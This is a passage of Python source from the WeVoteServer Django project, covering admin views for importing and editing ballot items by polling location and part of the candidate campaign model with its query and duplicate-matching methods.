ballot_items_to_display.append(candidate.copy())
if office_success and len(office_list):
for office in office_list:
ballot_items_to_display.append(office.copy())
if measure_success and len(measure_list):
for measure in measure_list:
ballot_items_to_display.append(measure.copy())
json_data = {
'status': status,
'success': candidate_success or measure_success,
'ballot_item_list': ballot_items_to_display,
'google_civic_election_id': google_civic_election_id,
}
results = {
'status': status,
'success': candidate_success or measure_success,
'google_civic_election_id': google_civic_election_id, # We want to save google_civic_election_id in cookie
'json_data': json_data,
}
return results
```
#### File: WeVoteServer/ballot/views_admin.py
```python
from .controllers import ballot_items_import_from_master_server, ballot_returned_import_from_master_server
from .models import BallotItem, BallotItemListManager, BallotItemManager, BallotReturned, BallotReturnedManager
from .serializers import BallotItemSerializer, BallotReturnedSerializer
from admin_tools.views import redirect_to_sign_in_page
from office.models import ContestOffice, ContestOfficeManager
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from election.models import Election, ElectionManager
from geopy.geocoders import get_geocoder_for_service
from measure.models import ContestMeasure, ContestMeasureManager
from polling_location.models import PollingLocation, PollingLocationManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
# This page does not need to be protected.
class BallotItemsSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
ballot_item_list = BallotItem.objects.all()
# We only want BallotItem values associated with polling locations
ballot_item_list = ballot_item_list.exclude(polling_location_we_vote_id__isnull=True).exclude(
polling_location_we_vote_id__exact='')
if positive_value_exists(google_civic_election_id):
ballot_item_list = ballot_item_list.filter(google_civic_election_id=google_civic_election_id)
serializer = BallotItemSerializer(ballot_item_list, many=True)
return Response(serializer.data)
# This page does not need to be protected.
class BallotReturnedSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
ballot_returned_list = BallotReturned.objects.all()
# We only want BallotReturned values associated with polling locations
ballot_returned_list = ballot_returned_list.exclude(polling_location_we_vote_id__isnull=True).exclude(
polling_location_we_vote_id__exact='')
if positive_value_exists(google_civic_election_id):
ballot_returned_list = ballot_returned_list.filter(google_civic_election_id=google_civic_election_id)
serializer = BallotReturnedSerializer(ballot_returned_list, many=True)
return Response(serializer.data)
@login_required
def ballot_items_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = ballot_items_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Ballot Items import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def ballot_returned_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = ballot_returned_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Ballot Returned import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def ballot_item_list_edit_view(request, ballot_returned_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# We can accept either, but give preference to polling_location_id
polling_location_id = request.GET.get('polling_location_id', 0)
polling_location_we_vote_id = request.GET.get('polling_location_we_vote_id', '')
polling_location_city = request.GET.get('polling_location_city', '')
polling_location_zip = request.GET.get('polling_location_zip', '')
ballot_returned_found = False
ballot_returned = BallotReturned()
ballot_returned_manager = BallotReturnedManager()
results = ballot_returned_manager.retrieve_existing_ballot_returned_by_identifier(ballot_returned_id)
if results['ballot_returned_found']:
ballot_returned = results['ballot_returned']
ballot_returned_found = True
google_civic_election_id = ballot_returned.google_civic_election_id
else:
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
google_civic_election_id = convert_to_int(google_civic_election_id)
election = Election()
election_state = ''
contest_measure_list = []
contest_office_list = []
if google_civic_election_id:
election_manager = ElectionManager()
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
election = results['election']
election_state = election.get_election_state()
# Get a list of offices for this election so we can create drop downs
try:
contest_office_list = ContestOffice.objects.order_by('office_name')
contest_office_list = contest_office_list.filter(google_civic_election_id=google_civic_election_id)
except Exception as e:
contest_office_list = []
# Get a list of measures for this election so we can create drop downs
try:
contest_measure_list = ContestMeasure.objects.order_by('measure_title')
contest_measure_list = contest_measure_list.filter(google_civic_election_id=google_civic_election_id)
except Exception as e:
contest_measure_list = []
else:
messages.add_message(request, messages.ERROR, 'In order to create a \'ballot_returned\' entry, '
'a google_civic_election_id is required.')
polling_location_found = False
polling_location = PollingLocation()
polling_location_manager = PollingLocationManager()
if positive_value_exists(polling_location_id):
results = polling_location_manager.retrieve_polling_location_by_id(polling_location_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
if not polling_location_found and positive_value_exists(polling_location_we_vote_id):
results = polling_location_manager.retrieve_polling_location_by_id(0, polling_location_we_vote_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
polling_location_list = []
if not polling_location_found:
results = polling_location_manager.retrieve_polling_locations_in_city_or_state(
election_state, polling_location_city, polling_location_zip)
if results['polling_location_list_found']:
polling_location_list = results['polling_location_list']
messages_on_stage = get_messages(request)
ballot_item_list = []
if ballot_returned_found:
# Get a list of ballot_items stored at this location
ballot_item_list_manager = BallotItemListManager()
if positive_value_exists(ballot_returned.polling_location_we_vote_id):
results = ballot_item_list_manager.retrieve_all_ballot_items_for_polling_location(
ballot_returned.polling_location_we_vote_id, google_civic_election_id)
if results['ballot_item_list_found']:
ballot_item_list = results['ballot_item_list']
template_values = {
'messages_on_stage': messages_on_stage,
'ballot_returned': ballot_returned,
'ballot_returned_id': ballot_returned_id,
'election': election,
'measure_list': contest_measure_list,
'office_list': contest_office_list,
'polling_location_we_vote_id': polling_location_we_vote_id,
'polling_location_found': polling_location_found,
'polling_location': polling_location,
'polling_location_list': polling_location_list,
'polling_location_city': polling_location_city,
'polling_location_zip': polling_location_zip,
'ballot_item_list': ballot_item_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'ballot/ballot_item_list_edit.html', template_values)
@login_required
def ballot_item_list_edit_process_view(request):
"""
Process the new or edit ballot form
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
ballot_returned_id = convert_to_int(request.POST.get('ballot_returned_id', 0))
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
polling_location_id = convert_to_int(request.POST.get('polling_location_id', 0))
polling_location_city = request.POST.get('polling_location_city', '')
polling_location_zip = request.POST.get('polling_location_zip', '')
contest_office1_id = request.POST.get('contest_office1_id', 0)
contest_office1_order = request.POST.get('contest_office1_order', 0)
contest_measure1_id = request.POST.get('contest_measure1_id', 0)
election_local_id = 0
# Find existing ballot_returned
ballot_returned_found = False
ballot_returned = BallotReturned()
if positive_value_exists(ballot_returned_id):
try:
ballot_returned_query = BallotReturned.objects.filter(id=ballot_returned_id)
if len(ballot_returned_query):
ballot_returned = ballot_returned_query[0]
ballot_returned_found = True
except Exception as e:
pass
election_manager = ElectionManager()
polling_location_manager = PollingLocationManager()
polling_location = PollingLocation()
polling_location_found = False
try:
if ballot_returned_found:
# Update
# Check to see if this is a We Vote-created election
is_we_vote_google_civic_election_id = True \
if convert_to_int(ballot_returned.google_civic_election_id) >= 1000000 \
else False
results = election_manager.retrieve_election(ballot_returned.google_civic_election_id)
if results['election_found']:
election = results['election']
election_local_id = election.id
# polling_location must be found
# We cannot change a polling location once saved, so we ignore the incoming polling_location_id here
results = polling_location_manager.retrieve_polling_location_by_id(
0, ballot_returned.polling_location_we_vote_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
else:
# Create new ballot_returned entry
# election must be found
election_results = election_manager.retrieve_election(google_civic_election_id)
if election_results['election_found']:
election = election_results['election']
election_local_id = election.id
state_code = election.get_election_state()
else:
messages.add_message(request, messages.ERROR, 'Could not find election -- '
'required to save ballot_returned.')
return HttpResponseRedirect(reverse('ballot:ballot_item_list_edit', args=(ballot_returned_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&polling_location_id=" + str(polling_location_id) +
"&polling_location_city=" + polling_location_city +
"&polling_location_zip=" + str(polling_location_zip)
)
# polling_location must be found
if positive_value_exists(polling_location_id):
results = polling_location_manager.retrieve_polling_location_by_id(polling_location_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
if not polling_location_found:
messages.add_message(request, messages.ERROR, 'Could not find polling_location -- '
'required to save ballot_returned.')
return HttpResponseRedirect(reverse('ballot:ballot_item_list_edit', args=(ballot_returned_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&polling_location_id=" + str(polling_location_id) +
"&polling_location_city=" + polling_location_city +
"&polling_location_zip=" + str(polling_location_zip)
)
ballot_returned = BallotReturned(
election_date=election.election_day_text,
election_description_text=election.election_name,
google_civic_election_id=google_civic_election_id,
polling_location_we_vote_id=polling_location.we_vote_id,
normalized_city=polling_location.city,
normalized_line1=polling_location.line1,
normalized_line2=polling_location.line2,
normalized_state=polling_location.state,
normalized_zip=polling_location.get_formatted_zip(),
text_for_map_search=polling_location.get_text_for_map_search(),
)
ballot_returned.save()
ballot_returned_id = ballot_returned.id
ballot_returned_found = True
messages.add_message(request, messages.INFO, 'New ballot_returned saved.')
# #######################################
# Make sure we have saved a latitude and longitude for the ballot_returned entry
if ballot_returned_found and positive_value_exists(ballot_returned.text_for_map_search):
if not ballot_returned.latitude or not ballot_returned.longitude:
google_client = get_geocoder_for_service('google')()
location = google_client.geocode(ballot_returned.text_for_map_search)
if location is None:
status = 'Could not find location matching "{}"'.format(ballot_returned.text_for_map_search)
else:
ballot_returned.latitude = location.latitude
ballot_returned.longitude = location.longitude
ballot_returned.save()
# #######################################
# Now create new ballot_item entries
# Contest Office 1
ballot_item_manager = BallotItemManager()
contest_office_manager = ContestOfficeManager()
results = contest_office_manager.retrieve_contest_office(contest_office1_id)
if results['contest_office_found']:
contest_office = results['contest_office']
ballot_item_display_name = contest_office.office_name
google_ballot_placement = 0
measure_subtitle = ''
local_ballot_order = contest_office1_order if positive_value_exists(contest_office1_order) else 0
results = ballot_item_manager.update_or_create_ballot_item_for_polling_location(
polling_location.we_vote_id, google_civic_election_id, google_ballot_placement,
ballot_item_display_name, measure_subtitle, local_ballot_order,
contest_office.id, contest_office.we_vote_id)
if results['new_ballot_item_created']:
messages.add_message(request, messages.INFO, 'Office 1 added.')
else:
messages.add_message(request, messages.ERROR, 'Office 1 could not be added.')
# Contest Measure 1
ballot_item_manager = BallotItemManager()
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure(contest_measure1_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
google_ballot_placement = 0
ballot_item_display_name = contest_measure.measure_title
contest_office_id = 0
contest_office_we_vote_id = ''
local_ballot_order = 0
ballot_item_manager.update_or_create_ballot_item_for_polling_location(
polling_location.we_vote_id, google_civic_election_id, google_ballot_placement,
ballot_item_display_name, contest_measure.measure_subtitle, local_ballot_order,
contest_office_id, contest_office_we_vote_id,
contest_measure.id)
except Exception as e:
messages.add_message(request, messages.ERROR, 'Could not save ballot_returned.')
return HttpResponseRedirect(reverse('ballot:ballot_item_list_edit', args=(ballot_returned_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&polling_location_id=" + str(polling_location_id) +
"&polling_location_city=" + polling_location_city +
"&polling_location_zip=" + str(polling_location_zip)
)
```
#### File: WeVoteServer/candidate/models.py
```python
from django.db import models
from django.db.models import Q
from election.models import Election
from exception.models import handle_exception, handle_record_found_more_than_one_exception
from office.models import ContestOffice, ContestOfficeManager
import re
from wevote_settings.models import fetch_next_we_vote_id_last_candidate_campaign_integer, fetch_site_unique_id_prefix
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, display_full_name_with_correct_capitalization, \
extract_first_name_from_full_name, \
extract_last_name_from_full_name, extract_state_from_ocd_division_id, extract_twitter_handle_from_text_string, \
positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
class CandidateCampaignListManager(models.Model):
"""
This is a class to make it easy to retrieve lists of Candidates
"""
def retrieve_all_candidates_for_office(self, office_id, office_we_vote_id):
candidate_list = []
candidate_list_found = False
if not positive_value_exists(office_id) and not positive_value_exists(office_we_vote_id):
status = 'VALID_OFFICE_ID_AND_OFFICE_WE_VOTE_ID_MISSING'
results = {
'success': True if candidate_list_found else False,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list,
}
return results
try:
candidate_queryset = CandidateCampaign.objects.all()
if positive_value_exists(office_id):
candidate_queryset = candidate_queryset.filter(contest_office_id=office_id)
elif positive_value_exists(office_we_vote_id):
candidate_queryset = candidate_queryset.filter(contest_office_we_vote_id=office_we_vote_id)
candidate_queryset = candidate_queryset.order_by('-twitter_followers_count')
candidate_list = candidate_queryset
if len(candidate_list):
candidate_list_found = True
status = 'CANDIDATES_RETRIEVED'
else:
status = 'NO_CANDIDATES_RETRIEVED'
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_DoesNotExist'
candidate_list = []
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_all_candidates_for_office ' \
'{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
results = {
'success': True if candidate_list_found else False,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list,
}
return results
def retrieve_all_candidates_for_upcoming_election(self, google_civic_election_id=0,
return_list_of_objects=False):
candidate_list_objects = []
candidate_list_light = []
candidate_list_found = False
try:
candidate_queryset = CandidateCampaign.objects.all()
if positive_value_exists(google_civic_election_id):
candidate_queryset = candidate_queryset.filter(google_civic_election_id=google_civic_election_id)
else:
# TODO Limit this search to upcoming_elections only
pass
candidate_queryset = candidate_queryset.order_by("candidate_name")
if positive_value_exists(google_civic_election_id):
candidate_list_objects = candidate_queryset
else:
candidate_list_objects = candidate_queryset[:300]
if len(candidate_list_objects):
candidate_list_found = True
status = 'CANDIDATES_RETRIEVED'
success = True
else:
status = 'NO_CANDIDATES_RETRIEVED'
success = True
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_DoesNotExist'
candidate_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_all_candidates_for_office ' \
'{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
success = False
if candidate_list_found:
for candidate in candidate_list_objects:
one_candidate = {
'ballot_item_display_name': candidate.display_candidate_name(),
'candidate_we_vote_id': candidate.we_vote_id,
'office_we_vote_id': candidate.contest_office_we_vote_id,
'measure_we_vote_id': '',
}
candidate_list_light.append(one_candidate.copy())
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'candidate_list_found': candidate_list_found,
'candidate_list_objects': candidate_list_objects if return_list_of_objects else [],
'candidate_list_light': candidate_list_light,
}
return results
def retrieve_candidate_count_for_office(self, office_id, office_we_vote_id):
if not positive_value_exists(office_id) and not positive_value_exists(office_we_vote_id):
status = 'VALID_OFFICE_ID_AND_OFFICE_WE_VOTE_ID_MISSING'
results = {
'success': False,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_count': 0,
}
return results
try:
candidate_queryset = CandidateCampaign.objects.all()
if positive_value_exists(office_id):
candidate_queryset = candidate_queryset.filter(contest_office_id=office_id)
elif positive_value_exists(office_we_vote_id):
candidate_queryset = candidate_queryset.filter(contest_office_we_vote_id=office_we_vote_id)
candidate_list = candidate_queryset
candidate_count = candidate_list.count()
success = True
status = "CANDIDATE_COUNT_FOUND"
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_DoesNotExist'
candidate_count = 0
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_all_candidates_for_office ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
candidate_count = 0
results = {
'success': success,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_count': candidate_count,
}
return results
def is_automatic_merge_ok(self, candidate_option1, candidate_option2):
automatic_merge_ok = True
status = ""
if candidate_option1.candidate_name != candidate_option2.candidate_name:
automatic_merge_ok = False
status += " candidate_name:"
if candidate_option1.candidate_twitter_handle != candidate_option2.candidate_twitter_handle:
automatic_merge_ok = False
status += " candidate_twitter_handle:"
if candidate_option1.candidate_url != candidate_option2.candidate_url:
automatic_merge_ok = False
status += " candidate_url:"
if not automatic_merge_ok:
status = "Different: " + status
results = {
"status": status,
"automatic_merge_ok": automatic_merge_ok,
}
return results
def do_automatic_merge(self, candidate_option1, candidate_option2):
success = False
status = "do_automatic_merge NOT IMPLEMENTED YET"
results = {
'success': success,
'status': status,
}
return results
def find_and_remove_duplicate_candidates(self, google_civic_election_id, merge=False, remove=False):
success = False
status = "find_and_remove_duplicate_candidates NOT IMPLEMENTED YET"
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
}
return results
def retrieve_candidate_campaigns_from_all_elections_list(self):
"""
This is used by the admin tools to show CandidateCampaigns in a drop-down for example
"""
candidates_list_temp = CandidateCampaign.objects.all()
# Order by candidate_name.
# To order by last name we will need to make some guesses in some case about what the last name is.
candidates_list_temp = candidates_list_temp.order_by('candidate_name')[:300]
return candidates_list_temp
def remove_duplicate_candidate(self, candidate_id, google_civic_election_id):
# TODO DALE We need to delete the positions associated with this candidate, and convert them to belong
# to candidate we leave in place.
success = False
status = "COULD_NOT_DELETE_DUPLICATE_CANDIDATE"
results = {
'success': success,
'status': status,
}
return results
def retrieve_possible_duplicate_candidates(self, candidate_name, google_civic_candidate_name,
google_civic_election_id, office_we_vote_id,
politician_we_vote_id,
candidate_twitter_handle, vote_smart_id, maplight_id,
we_vote_id_from_master=''):
candidate_list_objects = []
filters = []
candidate_list_found = False
try:
candidate_queryset = CandidateCampaign.objects.all()
candidate_queryset = candidate_queryset.filter(google_civic_election_id=google_civic_election_id)
# We don't look for office_we_vote_id because of the chance that locally we are using a
# different we_vote_id
# candidate_queryset = candidate_queryset.filter(contest_office_we_vote_id__iexact=office_we_vote_id)
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
candidate_queryset = candidate_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# We want to find candidates with *any* of these values
if positive_value_exists(google_civic_candidate_name):
new_filter = Q(google_civic_candidate_name__exact=google_civic_candidate_name)
filters.append(new_filter)
elif positive_value_exists(candidate_name):
new_filter = Q(candidate_name__iexact=candidate_name)
filters.append(new_filter)
if positive_value_exists(politician_we_vote_id):
new_filter = Q(politician_we_vote_id__iexact=politician_we_vote_id)
filters.append(new_filter)
if positive_value_exists(candidate_twitter_handle):
new_filter = Q(candidate_twitter_handle__iexact=candidate_twitter_handle)
filters.append(new_filter)
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id=vote_smart_id)
filters.append(new_filter)
if positive_value_exists(maplight_id):
new_filter = Q(maplight_id=maplight_id)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
candidate_queryset = candidate_queryset.filter(final_filters)
candidate_list_objects = candidate_queryset
if len(candidate_list_objects):
candidate_list_found = True
status = 'DUPLICATE_CANDIDATES_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_CANDIDATES_RETRIEVED'
success = True
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_DUPLICATE_CANDIDATES_FOUND_DoesNotExist'
candidate_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_candidates ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list_objects,
}
return results
def retrieve_candidates_from_non_unique_identifiers(self, twitter_handle, google_civic_election_id=0):
candidate_list_objects = []
candidate_list_found = False
twitter_handle_filtered = extract_twitter_handle_from_text_string(twitter_handle)
try:
candidate_queryset = CandidateCampaign.objects.all()
candidate_queryset = candidate_queryset.filter(candidate_twitter_handle__iexact=twitter_handle_filtered)
if positive_value_exists(google_civic_election_id):
candidate_queryset = candidate_queryset.filter(google_civic_election_id=google_civic_election_id)
candidate_queryset = candidate_queryset.order_by('-id')
candidate_list_objects = candidate_queryset
if len(candidate_list_objects):
candidate_list_found = True
status = 'CANDIDATES_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
else:
status = 'NO_CANDIDATES_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_FROM_TWITTER_HANDLE_DoesNotExist'
candidate_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_candidates_from_non_unique_identifiers ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list_objects,
}
return results
class CandidateCampaign(models.Model):
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "cand", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_candidate_campaign_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id of this candidate campaign", max_length=255, default=None, null=True,
blank=True, unique=True)
maplight_id = models.CharField(
verbose_name="maplight candidate id", max_length=255, default=None, null=True, blank=True, unique=True)
vote_smart_id = models.CharField(
verbose_name="vote smart candidate id", max_length=15, default=None, null=True, blank=True, unique=False)
# The internal We Vote id for the ContestOffice that this candidate is competing for. During setup we need to allow
# this to be null.
contest_office_id = models.CharField(
verbose_name="contest_office_id id", max_length=255, null=True, blank=True)
# We want to link the candidate to the contest with permanent ids so we can export and import
contest_office_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the office this candidate is running for", max_length=255, default=None,
null=True, blank=True, unique=False)
contest_office_name = models.CharField(verbose_name="name of the office", max_length=255, null=True, blank=True)
# politician (internal) link to local We Vote Politician entry. During setup we need to allow this to be null.
politician_id = models.BigIntegerField(verbose_name="politician unique identifier", null=True, blank=True)
# The persistent We Vote unique ID of the Politician, so we can export and import into other databases.
politician_we_vote_id = models.CharField(
verbose_name="we vote politician id", max_length=255, null=True, blank=True)
# The candidate's name.
candidate_name = models.CharField(verbose_name="candidate name", max_length=255, null=False, blank=False)
# The candidate's name as passed over by Google Civic. We save this so we can match to this candidate even
# if we edit the candidate's name locally.
google_civic_candidate_name = models.CharField(verbose_name="candidate name exactly as received from google civic",
max_length=255, null=False, blank=False)
# The full name of the party the candidate is a member of.
party = models.CharField(verbose_name="party", max_length=255, null=True, blank=True)
# A URL for a photo of the candidate.
photo_url = models.CharField(verbose_name="photoUrl", max_length=255, null=True, blank=True)
photo_url_from_maplight = models.URLField(
verbose_name='candidate portrait url of candidate from maplight', blank=True, null=True)
photo_url_from_vote_smart = models.URLField(
verbose_name='candidate portrait url of candidate from vote smart', blank=True, null=True)
# The order the candidate appears on the ballot relative to other candidates for this contest.
order_on_ballot = models.CharField(verbose_name="order on ballot", max_length=255, null=True, blank=True)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(
verbose_name="google civic election id", max_length=255, null=True, blank=True)
google_civic_election_id_new = models.PositiveIntegerField(
verbose_name="google civic election id", default=0, null=True, blank=True)
ocd_division_id = models.CharField(verbose_name="ocd division id", max_length=255, null=True, blank=True)
# State code
state_code = models.CharField(verbose_name="state this candidate serves", max_length=2, null=True, blank=True)
# The URL for the candidate's campaign web site.
candidate_url = models.URLField(verbose_name='website url of candidate campaign', blank=True, null=True)
facebook_url = models.URLField(verbose_name='facebook url of candidate campaign', blank=True, null=True)
twitter_url = models.URLField(verbose_name='twitter url of candidate campaign', blank=True, null=True)
twitter_user_id = models.BigIntegerField(verbose_name="twitter id", null=True, blank=True)
candidate_twitter_handle = models.CharField(
verbose_name='candidate twitter screen_name', max_length=255, null=True, unique=False)
twitter_name = models.CharField(
verbose_name="org name from twitter", max_length=255, null=True, blank=True)
twitter_location = models.CharField(
verbose_name="org location from twitter", max_length=255, null=True, blank=True)
twitter_followers_count = models.IntegerField(verbose_name="number of twitter followers",
null=False, blank=True, default=0)
twitter_profile_image_url_https = models.URLField(verbose_name='url of logo from twitter', blank=True, null=True)
twitter_profile_background_image_url_https = models.URLField(verbose_name='tile-able background from twitter',
blank=True, null=True)
twitter_profile_banner_url_https = models.URLField(verbose_name='profile banner image from twitter',
blank=True, null=True)
twitter_description = models.CharField(verbose_name="Text description of this organization from twitter.",
max_length=255, null=True, blank=True)
google_plus_url = models.URLField(verbose_name='google plus url of candidate campaign', blank=True, null=True)
youtube_url = models.URLField(verbose_name='youtube url of candidate campaign', blank=True, null=True)
# The email address for the candidate's campaign.
candidate_email = models.CharField(verbose_name="candidate campaign email", max_length=255, null=True, blank=True)
# The voice phone number for the candidate's campaign office.
candidate_phone = models.CharField(verbose_name="candidate campaign phone", max_length=255, null=True, blank=True)
wikipedia_page_id = models.BigIntegerField(verbose_name="pageid", null=True, blank=True)
wikipedia_page_title = models.CharField(
verbose_name="Page title on Wikipedia", max_length=255, null=True, blank=True)
wikipedia_photo_url = models.URLField(verbose_name='url of wikipedia logo', blank=True, null=True)
ballotpedia_page_title = models.CharField(
verbose_name="Page title on Ballotpedia", max_length=255, null=True, blank=True)
ballotpedia_photo_url = models.URLField(verbose_name='url of ballotpedia logo', blank=True, null=True)
# Official Statement from Candidate in Ballot Guide
ballot_guide_official_statement = models.TextField(verbose_name="official candidate statement from ballot guide",
null=True, blank=True, default="")
def election(self):
try:
election = Election.objects.get(google_civic_election_id=self.google_civic_election_id)
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("candidate.election Found multiple")
return
except Election.DoesNotExist:
logger.error("candidate.election did not find")
return
return election
def office(self):
try:
office = ContestOffice.objects.get(id=self.contest_office_id)
except ContestOffice.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("candidate.election Found multiple")
return
except ContestOffice.DoesNotExist:
logger.error("candidate.election did not find")
return
return office
def candidate_photo_url(self):
if self.photo_url_from_vote_smart:
return self.photo_url_from_vote_smart_large()
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https_original()
if self.photo_url_from_maplight:
return self.photo_url_from_maplight
if self.photo_url:
return self.photo_url
else:
return ""
# "http://votersedge.org/sites/all/modules/map/modules/map_proposition/images/politicians/2662.jpg"
# else:
# politician_manager = PoliticianManager()
# return politician_manager.politician_photo_url(self.politician_id)
def photo_url_from_vote_smart_large(self):
if positive_value_exists(self.photo_url_from_vote_smart):
# Use regex to replace '.jpg' with '_lg.jpg'
# Vote smart returns the link to the small photo, but we want to use the large photo
photo_url_from_vote_smart_large = re.sub(r'.jpg', r'_lg.jpg', self.photo_url_from_vote_smart)
return photo_url_from_vote_smart_large
else:
return ""
def fetch_twitter_handle(self):
if positive_value_exists(self.candidate_twitter_handle):
return self.candidate_twitter_handle
elif self.twitter_url:
# Extract the twitter handle from twitter_url if we don't have it stored as a handle yet
return extract_twitter_handle_from_text_string(self.twitter_url)
return self.twitter_url
def twitter_profile_image_url_https_bigger(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "_bigger")
else:
return ''
def twitter_profile_image_url_https_original(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "")
else:
return ''
def generate_twitter_link(self):
if self.candidate_twitter_handle:
return "https://twitter.com/{twitter_handle}".format(twitter_handle=self.candidate_twitter_handle)
else:
return ''
def get_candidate_state(self):
if positive_value_exists(self.state_code):
return self.state_code
else:
# Pull this from ocdDivisionId
if positive_value_exists(self.ocd_division_id):
ocd_division_id = self.ocd_division_id
return extract_state_from_ocd_division_id(ocd_division_id)
else:
return ''
def display_candidate_name(self):
full_name = self.candidate_name
if full_name.isupper():
full_name_corrected_capitalization = display_full_name_with_correct_capitalization(full_name)
return full_name_corrected_capitalization
return full_name
def extract_first_name(self):
full_name = self.display_candidate_name()
return extract_first_name_from_full_name(full_name)
def extract_last_name(self):
